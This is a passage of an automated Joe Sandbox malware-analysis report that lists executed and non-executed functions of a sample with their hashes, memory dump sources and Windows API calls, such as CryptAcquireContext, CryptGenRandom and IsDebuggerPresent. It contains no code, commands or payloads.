                                                                                                          • Instruction ID: 220b5bb1b83f6d0d9278051d1febb9cc37b663d9b5e5a28ebd0aa7042419d2a4
                                                                                                          • Opcode Fuzzy Hash: 9552ba7bb820f6eb65a7c18b90242a489bcaa0c16e681b5ba9550c4f205e26f3
                                                                                                          • Instruction Fuzzy Hash: 190152353001149FD748EB6DD499C6DBBE6FF8D61534144A9E10ADB371DE31EC018B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 059421E0 Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985194457.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5940000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d598175479a1fcf6be008c76edd4185078e98650ab580affc2877a2b9e780fcb
                                                                                                          • Instruction ID: a5bd2150b5265ef856c654230a7494393c68828c7162a27fbc85353aaaadb08e
                                                                                                          • Opcode Fuzzy Hash: d598175479a1fcf6be008c76edd4185078e98650ab580affc2877a2b9e780fcb
                                                                                                          • Instruction Fuzzy Hash: 0D018835B002166BCB14DBAE9991A6FF7BBFFD4210F248029E505A7344CE71AD0687F1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00D1D149 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983711139.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_d1d000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9969b299e9ac5dd62c96be110aa535aa9ed5d0042d7cb1bf4dad51d2a2d656bd
                                                                                                          • Instruction ID: 6017c99256aa31d966d8f1e0507abad4875358f64b8fc0e6190e5fa6a314c3b8
                                                                                                          • Opcode Fuzzy Hash: 9969b299e9ac5dd62c96be110aa535aa9ed5d0042d7cb1bf4dad51d2a2d656bd
                                                                                                          • Instruction Fuzzy Hash: 0601A771104340BEE7209A19DCC4BA7BFA9DF55720F1C855AED494B282C77998C0CA75
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00D1D148 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983711139.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_d1d000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 992285f2e68c02883f6c0ef1c1fe160e9137ae998712df5cf394bc1a177fe8a0
                                                                                                          • Instruction ID: 183eff899652d91846e95fd248912c3d462608b7cf8afddfe5fa9418e3b09759
                                                                                                          • Opcode Fuzzy Hash: 992285f2e68c02883f6c0ef1c1fe160e9137ae998712df5cf394bc1a177fe8a0
                                                                                                          • Instruction Fuzzy Hash: 23F06871504344BEE7118A15DCC4BA2FFA9EB51734F18C45AED485B246C3795C84CA71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 6F03A0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6F0B0634,6F0B0738,?), ref: 6F03A119
                                                                                                          • GetModuleHandleW.KERNEL32(mscorwks), ref: 6F03A145
                                                                                                          • __cftoe.LIBCMT ref: 6F03A1FB
                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 6F03A215
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000018), ref: 6F03A265
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                                                                                          • String ID: mscorwks$v2.0.50727$wks
                                                                                                          • API String ID: 1312202379-2066655427
                                                                                                          • Opcode ID: 4e0484d0bf5a5af5f1320aa9f0760ac3a3dcf28216c842ab6f7b3826533b3461
                                                                                                          • Instruction ID: c9f048ddcfdbe1b60794144dd4e3b31ec5ac90e7e3e57a462cad340e4601de71
                                                                                                          • Opcode Fuzzy Hash: 4e0484d0bf5a5af5f1320aa9f0760ac3a3dcf28216c842ab6f7b3826533b3461
                                                                                                          • Instruction Fuzzy Hash: 43916875D0425A9FCF04DFE8C980A9EBBF5BF49310F20826EE519EB280D735A905CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07DBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,F6D10407,6F0A8180,00000000,?), ref: 6F07DBFB
                                                                                                          • GetLastError.KERNEL32 ref: 6F07DC01
                                                                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6F07DC15
                                                                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6F07DC26
                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6F07DC2D
                                                                                                            • Part of subcall function 6F07D9D0: GetLastError.KERNEL32(00000010,F6D10407,762501B0,?,00000000), ref: 6F07DA1A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F07DC78
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                                                                                          • String ID: CryptAcquireContext$Crypto++ RNG
                                                                                                          • API String ID: 3279666080-1159690233
                                                                                                          • Opcode ID: 46105246fa2f1209e7cdcb66ae3706bb3250f730f54239845c3f28c9ac08acbf
                                                                                                          • Instruction ID: 7faa858af831e01f0bd10fc449362d72f553b835253624378698d386f05f1977
                                                                                                          • Opcode Fuzzy Hash: 46105246fa2f1209e7cdcb66ae3706bb3250f730f54239845c3f28c9ac08acbf
                                                                                                          • Instruction Fuzzy Hash: 8721D171248741BBE310DB68CC45F5BBBE8BF89B58F40091DF641A72C0EBB5A004CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6F08CE6C
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F08CE81
                                                                                                          • UnhandledExceptionFilter.KERNEL32(6F0A9428), ref: 6F08CE8C
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6F08CEA8
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6F08CEAF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: a68751ed416848180bd2fae5a793ca606ae0d0cddf5fb7493a5c98a211b209ea
                                                                                                          • Instruction ID: d353468fe59b3853e44b5c24ea4b4ca60fe063caec40072294ce1f1627b53790
                                                                                                          • Opcode Fuzzy Hash: a68751ed416848180bd2fae5a793ca606ae0d0cddf5fb7493a5c98a211b209ea
                                                                                                          • Instruction Fuzzy Hash: 4B2114F8804A04EFCF14DF29D584A48BBB4FB0A335F10519AE88987B50EBB059A0FF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F075DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0ecf66dded6e4c3a53976a2bc23c6921f5a45e183b68496eca7765311c0a2c84
                                                                                                          • Instruction ID: d7a2cb5f3802f1dc3b22f6b3314fb7d5e822e2277f497a37079d5220ba02f124
                                                                                                          • Opcode Fuzzy Hash: 0ecf66dded6e4c3a53976a2bc23c6921f5a45e183b68496eca7765311c0a2c84
                                                                                                          • Instruction Fuzzy Hash: C302F2B04187948FC754CF69C8A463FBBE1EBCA321F52094EE5F653291C734A568DB22
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F075EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 8601a60fc8a00ad3a636d37a9e4fd825f9a3f7023abc3f0209a7034e241a00d8
                                                                                                          • Instruction ID: d82cd538ebb247f6817c2f6ff97df0767aecd0a0de35d4bc86ebfbd7d8cd0299
                                                                                                          • Opcode Fuzzy Hash: 8601a60fc8a00ad3a636d37a9e4fd825f9a3f7023abc3f0209a7034e241a00d8
                                                                                                          • Instruction Fuzzy Hash: 75E190B04187948FC744CB69C8A453E7BE1EBCB221F52058EE5F6572A1D234A17DEB22
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CryptGenRandom.ADVAPI32(?,?,?,F6D10407,00000000), ref: 6F07DE6F
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F07DEB9
                                                                                                            • Part of subcall function 6F07DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6F09F0E6,000000FF,6F07DF67,00000000,?), ref: 6F07DDB4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                                                          • String ID: CryptGenRandom
                                                                                                          • API String ID: 1047471967-3616286655
                                                                                                          • Opcode ID: 4363e1ecc368e1c73183e8bd84c4f311aa1cf5ce99d97517a76fcb2283ccc540
                                                                                                          • Instruction ID: 010c8053c14a3e587931859c59e58ce5e06dabe4bfe379b566d79877d15be0a3
                                                                                                          • Opcode Fuzzy Hash: 4363e1ecc368e1c73183e8bd84c4f311aa1cf5ce99d97517a76fcb2283ccc540
                                                                                                          • Instruction Fuzzy Hash: 052147B51087809FD710DF24C844B5ABBE9BB89728F004A5EF8A597680EB75E508CF96
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07D9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000010,F6D10407,762501B0,?,00000000), ref: 6F07DA1A
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastXinvalid_argumentstd::_
                                                                                                          • String ID: operation failed with error $OS_Rng:
                                                                                                          • API String ID: 406877150-700108173
                                                                                                          • Opcode ID: bd791a54409b35ff2f7e7a06cf92317e641ff0299dd2c066085bf2fb51ad61be
                                                                                                          • Instruction ID: cc59116e0f39b5d3eb4681d7a141111aecd47fc640cd5679f6dbd7f40d40448f
                                                                                                          • Opcode Fuzzy Hash: bd791a54409b35ff2f7e7a06cf92317e641ff0299dd2c066085bf2fb51ad61be
                                                                                                          • Instruction Fuzzy Hash: 35418BB1908380EFD321CF68C841B5BFBE8BB99604F14492EE19D87381EB759404CB67
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07DEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024760: __CxxThrowException@8.LIBCMT ref: 6F0247F9
                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6F07DF7B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextCryptException@8ReleaseThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3140249258-0
                                                                                                          • Opcode ID: 1a529ce3c8caebbff9bd26b9ba8eab2542ff1f8c8f4966baffae62ca371fe9b5
                                                                                                          • Instruction ID: 83cfecd85530e33c2e1331b017786800c51da131db7b0ee23c381d848267b818
                                                                                                          • Opcode Fuzzy Hash: 1a529ce3c8caebbff9bd26b9ba8eab2542ff1f8c8f4966baffae62ca371fe9b5
                                                                                                          • Instruction Fuzzy Hash: 3921BEB550D340ABC310DF14C940B4BBBE9EB9A768F000A5DF84583381DB71E508CBA6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07DD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6F09F0E6,000000FF,6F07DF67,00000000,?), ref: 6F07DDB4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextCryptRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 829835001-0
                                                                                                          • Opcode ID: f8faff94babec797d0b2ffe9a22b01f7dd16e64547651efaaef330edadbe0ff6
                                                                                                          • Instruction ID: 2aedc24bea485481c4b109319ee97d59f30f2c70b7f836c0e84d10e65aaa9c01
                                                                                                          • Opcode Fuzzy Hash: f8faff94babec797d0b2ffe9a22b01f7dd16e64547651efaaef330edadbe0ff6
                                                                                                          • Instruction Fuzzy Hash: D41129F1608B419FEB20CF18C980B5673E8EB05724F0405AAE815C3380EF79E818CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07D7F0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6F07D803
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextCryptRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 829835001-0
                                                                                                          • Opcode ID: 43f3ebc61c1c023dd3d67db061115ae0b3c81fc84a0981e7e18d89aa23370b05
                                                                                                          • Instruction ID: 54024d263b8b08ba959151f89e9d0fb16316b8e8a16d92e7da5d8871d1ac60da
                                                                                                          • Opcode Fuzzy Hash: 43f3ebc61c1c023dd3d67db061115ae0b3c81fc84a0981e7e18d89aa23370b05
                                                                                                          • Instruction Fuzzy Hash: B2D02EB0B0531022D730AA148C00B87B7CC0F00A00F14443EF459C3380CAB0E440C3D8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07D7D4 Relevance: 1.5, APIs: 1, Instructions: 9encryptionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6F07D7E0
                                                                                                          Memory Dump Source
